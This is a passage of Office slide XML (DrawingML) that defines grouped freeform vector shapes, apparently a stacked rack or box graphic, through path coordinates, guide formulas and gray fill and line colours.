                      <a:gd name="T10" fmla="*/ 992 w 1025"/>
                      <a:gd name="T11" fmla="*/ 496 h 539"/>
                      <a:gd name="T12" fmla="*/ 33 w 1025"/>
                      <a:gd name="T13" fmla="*/ 241 h 539"/>
                      <a:gd name="T14" fmla="*/ 33 w 1025"/>
                      <a:gd name="T15" fmla="*/ 40 h 539"/>
                      <a:gd name="T16" fmla="*/ 992 w 1025"/>
                      <a:gd name="T17" fmla="*/ 298 h 539"/>
                      <a:gd name="T18" fmla="*/ 992 w 1025"/>
                      <a:gd name="T19" fmla="*/ 298 h 539"/>
                      <a:gd name="T20" fmla="*/ 992 w 1025"/>
                      <a:gd name="T21" fmla="*/ 496 h 5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025" h="539">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="539"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="274"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="992" y="496"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="298"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="298"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="496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5" name="Freeform 131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940" y="1770"/>
                    <a:ext cx="868" cy="458"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1025"/>
                      <a:gd name="T1" fmla="*/ 0 h 541"/>
                      <a:gd name="T2" fmla="*/ 0 w 1025"/>
                      <a:gd name="T3" fmla="*/ 267 h 541"/>
                      <a:gd name="T4" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T5" fmla="*/ 541 h 541"/>
                      <a:gd name="T6" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T7" fmla="*/ 274 h 541"/>
                      <a:gd name="T8" fmla="*/ 0 w 1025"/>
                      <a:gd name="T9" fmla="*/ 0 h 541"/>
                      <a:gd name="T10" fmla="*/ 992 w 1025"/>
                      <a:gd name="T11" fmla="*/ 499 h 541"/>
                      <a:gd name="T12" fmla="*/ 33 w 1025"/>
                      <a:gd name="T13" fmla="*/ 241 h 541"/>
                      <a:gd name="T14" fmla="*/ 33 w 1025"/>
                      <a:gd name="T15" fmla="*/ 43 h 541"/>
                      <a:gd name="T16" fmla="*/ 992 w 1025"/>
                      <a:gd name="T17" fmla="*/ 300 h 541"/>
                      <a:gd name="T18" fmla="*/ 992 w 1025"/>
                      <a:gd name="T19" fmla="*/ 300 h 541"/>
                      <a:gd name="T20" fmla="*/ 992 w 1025"/>
                      <a:gd name="T21" fmla="*/ 499 h 5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025" h="541">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="267"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="541"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="274"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="992" y="499"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="300"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="300"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="499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31" name="Freeform 132"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="1278" y="1707"/>
                  <a:ext cx="1081" cy="291"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T1" fmla="*/ 274 h 343"/>
                    <a:gd name="T2" fmla="*/ 257 w 1280"/>
                    <a:gd name="T3" fmla="*/ 0 h 343"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 69 h 343"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 343 h 343"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T9" fmla="*/ 274 h 3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0" h="343">
                      <a:moveTo>
                        <a:pt x="1280" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="274"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6D6D6C"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="545554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29" name="Group 133"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2092" y="1753"/>
                <a:ext cx="427" cy="411"/>
                <a:chOff x="200" y="1941"/>
                <a:chExt cx="1293" cy="1245"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="740" name="Freeform 134"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="200" y="1941"/>
                  <a:ext cx="1293" cy="1245"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 258 w 1535"/>
                    <a:gd name="T1" fmla="*/ 0 h 1472"/>
                    <a:gd name="T2" fmla="*/ 0 w 1535"/>
                    <a:gd name="T3" fmla="*/ 69 h 1472"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 1131 h 1472"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 1472 h 1472"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T9" fmla="*/ 411 h 1472"/>
                    <a:gd name="T10" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T11" fmla="*/ 343 h 1472"/>
                    <a:gd name="T12" fmla="*/ 258 w 1535"/>
                    <a:gd name="T13" fmla="*/ 0 h 14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35" h="1472">
                      <a:moveTo>
                        <a:pt x="258" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="1472"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="258" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6D6D6C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Freeform 135"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="200" y="2809"/>
                  <a:ext cx="1293" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 342 h 410"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 410"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 68 h 410"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 410 h 410"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 342 h 4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5" h="410">
                      <a:moveTo>
                        <a:pt x="1535" y="342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="410"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="342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2" name="Group 136"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="343" y="2707"/>
                  <a:ext cx="1063" cy="419"/>
                  <a:chOff x="4645" y="1918"/>
                  <a:chExt cx="356" cy="140"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="804" name="Group 137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645" y="1918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817" name="Freeform 13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18" name="Freeform 139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19" name="Freeform 14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05" name="Group 141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735" y="1942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814" name="Freeform 14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15" name="Freeform 143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16" name="Freeform 14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06" name="Group 145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825" y="1966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811" name="Freeform 14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12" name="Freeform 147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13" name="Freeform 14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07" name="Group 149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915" y="1990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808" name="Freeform 15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9" name="Freeform 151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10" name="Freeform 15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743" name="Freeform 153"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="200" y="2587"/>
                  <a:ext cx="1293" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 342 h 411"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 411"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 69 h 411"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 411 h 411"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 342 h 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5" h="411">
                      <a:moveTo>
                        <a:pt x="1535" y="342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="342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Freeform 154"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="200" y="2360"/>
                  <a:ext cx="1293" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 343 h 411"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 411"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 69 h 411"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 411 h 411"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 343 h 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5" h="411">
                      <a:moveTo>
                        <a:pt x="1535" y="343"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="343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Freeform 155"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="200" y="2136"/>
                  <a:ext cx="1293" cy="347"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T1" fmla="*/ 340 h 408"/>
                    <a:gd name="T2" fmla="*/ 255 w 1535"/>
                    <a:gd name="T3" fmla="*/ 0 h 408"/>
                    <a:gd name="T4" fmla="*/ 0 w 1535"/>
                    <a:gd name="T5" fmla="*/ 68 h 408"/>
                    <a:gd name="T6" fmla="*/ 1280 w 1535"/>
                    <a:gd name="T7" fmla="*/ 408 h 408"/>
                    <a:gd name="T8" fmla="*/ 1535 w 1535"/>
                    <a:gd name="T9" fmla="*/ 340 h 4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5" h="408">
                      <a:moveTo>
                        <a:pt x="1535" y="340"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="408"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1535" y="340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6" name="Group 156"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="343" y="2258"/>
                  <a:ext cx="1063" cy="416"/>
                  <a:chOff x="4645" y="1768"/>
                  <a:chExt cx="356" cy="139"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="788" name="Group 157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735" y="1792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801" name="Freeform 15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2" name="Freeform 159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3" name="Freeform 16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89" name="Group 161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645" y="1768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798" name="Freeform 16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99" name="Freeform 163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0" name="Freeform 16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90" name="Group 165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825" y="1817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795" name="Freeform 16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96" name="Freeform 167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97" name="Freeform 16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91" name="Group 169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915" y="1840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792" name="Freeform 17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93" name="Freeform 171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94" name="Freeform 17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747" name="Group 173"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="343" y="2022"/>
                  <a:ext cx="1063" cy="419"/>
                  <a:chOff x="4645" y="1918"/>
                  <a:chExt cx="356" cy="140"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="772" name="Group 174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645" y="1918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785" name="Freeform 175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6" name="Freeform 17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7" name="Freeform 177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73" name="Group 178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735" y="1942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782" name="Freeform 179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3" name="Freeform 18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4" name="Freeform 181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74" name="Group 182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825" y="1966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779" name="Freeform 183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0" name="Freeform 18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1" name="Freeform 185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75" name="Group 186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915" y="1990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776" name="Freeform 187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77" name="Freeform 18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78" name="Freeform 189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748" name="Group 190"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="343" y="2477"/>
                  <a:ext cx="1063" cy="419"/>
                  <a:chOff x="4645" y="1918"/>
                  <a:chExt cx="356" cy="140"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="756" name="Group 191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645" y="1918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769" name="Freeform 19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70" name="Freeform 193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71" name="Freeform 19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57" name="Group 195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735" y="1942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766" name="Freeform 19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67" name="Freeform 197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68" name="Freeform 19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58" name="Group 199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825" y="1966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763" name="Freeform 20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64" name="Freeform 201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65" name="Freeform 20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59" name="Group 203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915" y="1990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760" name="Freeform 20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61" name="Freeform 205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62" name="Freeform 20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749" name="Group 207"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="415" y="1998"/>
                  <a:ext cx="1078" cy="1188"/>
                  <a:chOff x="4616" y="1681"/>
                  <a:chExt cx="361" cy="397"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="752" name="Freeform 208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4616" y="1906"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 264 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 342 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 566 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 240 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 42 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 368 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 368 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 566 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="566"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="240"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="42"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="368"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="368"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="566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Freeform 209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4616" y="1831"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 265 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 343 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 565 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 43 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 565 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="343"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="565"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="565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Freeform 210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4616" y="1756"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 265 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 343 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 567 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 43 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 567 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="265"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="343"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="567"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="43"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="567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5" name="Freeform 211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4616" y="1681"/>
                    <a:ext cx="361" cy="172"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1280"/>
                      <a:gd name="T1" fmla="*/ 0 h 607"/>
                      <a:gd name="T2" fmla="*/ 0 w 1280"/>
                      <a:gd name="T3" fmla="*/ 264 h 607"/>
                      <a:gd name="T4" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T5" fmla="*/ 607 h 607"/>
                      <a:gd name="T6" fmla="*/ 1280 w 1280"/>
                      <a:gd name="T7" fmla="*/ 342 h 607"/>
                      <a:gd name="T8" fmla="*/ 0 w 1280"/>
                      <a:gd name="T9" fmla="*/ 0 h 607"/>
                      <a:gd name="T10" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T11" fmla="*/ 564 h 607"/>
                      <a:gd name="T12" fmla="*/ 33 w 1280"/>
                      <a:gd name="T13" fmla="*/ 241 h 607"/>
                      <a:gd name="T14" fmla="*/ 33 w 1280"/>
                      <a:gd name="T15" fmla="*/ 40 h 607"/>
                      <a:gd name="T16" fmla="*/ 1247 w 1280"/>
                      <a:gd name="T17" fmla="*/ 366 h 607"/>
                      <a:gd name="T18" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T19" fmla="*/ 366 h 607"/>
                      <a:gd name="T20" fmla="*/ 1250 w 1280"/>
                      <a:gd name="T21" fmla="*/ 564 h 6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80" h="607">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="607"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1280" y="342"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="1250" y="564"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="40"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1247" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="366"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1250" y="564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50" name="Freeform 212"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="200" y="2232"/>
                  <a:ext cx="215" cy="954"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 255"/>
                    <a:gd name="T1" fmla="*/ 68 h 1129"/>
                    <a:gd name="T2" fmla="*/ 0 w 255"/>
                    <a:gd name="T3" fmla="*/ 333 h 1129"/>
                    <a:gd name="T4" fmla="*/ 0 w 255"/>
                    <a:gd name="T5" fmla="*/ 373 h 1129"/>
                    <a:gd name="T6" fmla="*/ 0 w 255"/>
                    <a:gd name="T7" fmla="*/ 564 h 1129"/>
                    <a:gd name="T8" fmla="*/ 0 w 255"/>
                    <a:gd name="T9" fmla="*/ 597 h 1129"/>
                    <a:gd name="T10" fmla="*/ 0 w 255"/>
                    <a:gd name="T11" fmla="*/ 864 h 1129"/>
                    <a:gd name="T12" fmla="*/ 0 w 255"/>
                    <a:gd name="T13" fmla="*/ 897 h 1129"/>
                    <a:gd name="T14" fmla="*/ 0 w 255"/>
                    <a:gd name="T15" fmla="*/ 1129 h 1129"/>
                    <a:gd name="T16" fmla="*/ 255 w 255"/>
                    <a:gd name="T17" fmla="*/ 1060 h 1129"/>
                    <a:gd name="T18" fmla="*/ 255 w 255"/>
                    <a:gd name="T19" fmla="*/ 829 h 1129"/>
                    <a:gd name="T20" fmla="*/ 255 w 255"/>
                    <a:gd name="T21" fmla="*/ 796 h 1129"/>
                    <a:gd name="T22" fmla="*/ 255 w 255"/>
                    <a:gd name="T23" fmla="*/ 529 h 1129"/>
                    <a:gd name="T24" fmla="*/ 255 w 255"/>
                    <a:gd name="T25" fmla="*/ 496 h 1129"/>
                    <a:gd name="T26" fmla="*/ 255 w 255"/>
                    <a:gd name="T27" fmla="*/ 304 h 1129"/>
                    <a:gd name="T28" fmla="*/ 255 w 255"/>
                    <a:gd name="T29" fmla="*/ 264 h 1129"/>
                    <a:gd name="T30" fmla="*/ 255 w 255"/>
                    <a:gd name="T31" fmla="*/ 0 h 1129"/>
                    <a:gd name="T32" fmla="*/ 0 w 255"/>
                    <a:gd name="T33" fmla="*/ 68 h 1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55" h="1129">
                      <a:moveTo>
                        <a:pt x="0" y="68"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="333"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="564"/>
